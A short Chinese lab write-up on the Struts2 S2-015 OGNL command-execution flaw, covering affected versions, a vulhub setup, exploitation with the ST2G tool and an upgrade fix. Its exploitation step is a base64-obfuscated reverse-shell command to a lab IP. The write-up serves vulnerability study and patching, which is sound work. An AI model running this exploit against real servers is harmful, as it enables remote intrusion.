s2-015命令执行

概述

产生原因

漏洞产生于配置了 Action 通配符 *，并将其作为动态值时，解析时会将其内容执行 OGNL 表达式

影响

Struts 2.0.0 Struts 2.3.14.2

环境搭建

vulhub

cd struts2/s2-015
docker-compose up -d

复现

见利用

攻防

利用

使用工具ST2G扫描后进行利用

./ST2G --url "http://192.168.0.188:8081/S2-015/" --vn 15 --mode exec --cmd "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTg4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"

防御

升级 Struts 2.3.14.3

参考

https://cwiki.apache.org/confluence/display/WW/S2-015